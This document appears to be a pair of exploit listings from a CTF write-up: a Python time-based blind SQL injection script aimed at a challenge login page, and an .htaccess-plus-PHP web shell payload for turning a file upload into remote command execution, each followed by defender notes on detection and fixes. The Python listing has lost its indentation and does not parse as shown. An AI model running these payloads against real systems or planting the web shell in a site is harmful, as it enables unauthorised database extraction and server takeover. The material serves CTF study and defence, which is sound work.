1. SQL injection
2. file upload -> rce
sql_exploit.py
import requests
import string
import time
# Time-based blind SQL injection proof-of-concept from a CTF write-up.
# It recovers a value one character at a time: for each position `i` and
# candidate character `j` it injects a conditional sleep() into the
# `username` field of the login form and treats a slow response as a hit.
#
# Defender notes (what this traffic looks like server-side, and the fix):
#   - A burst of POSTs to the same login endpoint whose `username` field
#     contains `and if(`, `sleep(`, `substr(` or `information_schema`;
#     a request-logging / WAF rule on those tokens in credential fields
#     flags the unmodified script.
#   - Response latency on the login endpoint clustering around the sleep()
#     value (5 s here) while ordinary logins stay fast.
#   - The root cause is presumably login.php building SQL from the raw
#     `username` value; prepared statements with bound parameters prevent
#     this class of injection, and a per-query execution timeout blunts
#     the timing oracle.
# NOTE: the paste lost its indentation, so the script as shown will not
# parse (the `for` bodies sit at column 0); lines are kept byte-for-byte.
url = 'http://vkl-sql.darkarmy.xyz/login.php'  # CTF challenge login endpoint
table_name = ''  # accumulates recovered characters; name is stale - the active query below reads `username` from `user`
strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}'  # candidate alphabet tried at each position
for i in range(1,80):  # 1-based character position handed to substr()
for j in strings:  # try every candidate character at this position
#data = {'username':'admin" and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),'+str(i)+',1))='+str(ord(j))+',sleep(2),0)#','password':'aa'}
#data = {'username':'admin" and if(ascii(substr((select table_name from information_schema.tables where table_schema="darkcon" limit 0,1),'+str(i)+',1))='+str(ord(j))+',sleep(5),0)#','password':'aa'}
#data = {'username':'admin" and if(ascii(substr((select column_name from information_schema.columns where table_name="user" limit 1,1),'+str(i)+',1))='+str(ord(j))+',sleep(2),0)#','password':'aa'}
data = {'username':'admin" and if(ascii(substr((select username from user limit 0,1),'+str(i)+',1))='+str(ord(j))+',sleep(5),0)#','password':'aa'}  # DB sleeps 5 s only when the char at position i equals j
starttime = time.time()
res = requests.post(url,data=data)
endtime = time.time()
print(table_name+j)  # progress: recovered prefix plus the candidate just tried
if endtime-starttime>2:  # 2 s threshold against a 5 s sleep: a slow answer means the guess matched
print("find!")
table_name += str(j)  # commit the character and move on to the next position
break
else:
continue  # redundant: the loop advances anyway
upload
# Upload -> RCE payload from a CTF write-up, shown as one listing (it may be
# one or two uploaded files): an .htaccess-style fragment that maps a custom
# extension to the PHP handler, followed by a one-line PHP shell that runs
# whatever arrives in the `cmd` GET parameter.
#
# Defender notes:
#   - Letting a user write a file named .htaccess into a served directory is
#     a full compromise wherever AllowOverride permits it; set
#     `AllowOverride None` for upload locations or, better, store uploads
#     outside the document root and serve them without any script handler
#     (`php_admin_flag engine off` for that location).
#   - An extension allow-list alone does not stop this, since the uploaded
#     name need not end in .php; reject dotfiles, reject content containing
#     `<?php` / `<?`, and re-encode images server-side rather than trusting
#     header bytes.
#   - In access logs this shows up as GET requests to a freshly uploaded
#     path carrying a `cmd=` query string; treat a new .htaccess or any new
#     PHP-handled file under an upload directory as a file-integrity alert.
#define width 1337
#define height 1337
AddType application/x-httpd-php .shell
php_value zend.multibyte 1
php_value zend.detect_unicode 1
php_value display_errors 1
<?php system($_GET['cmd']);?>
#define width 1337
#define height 1337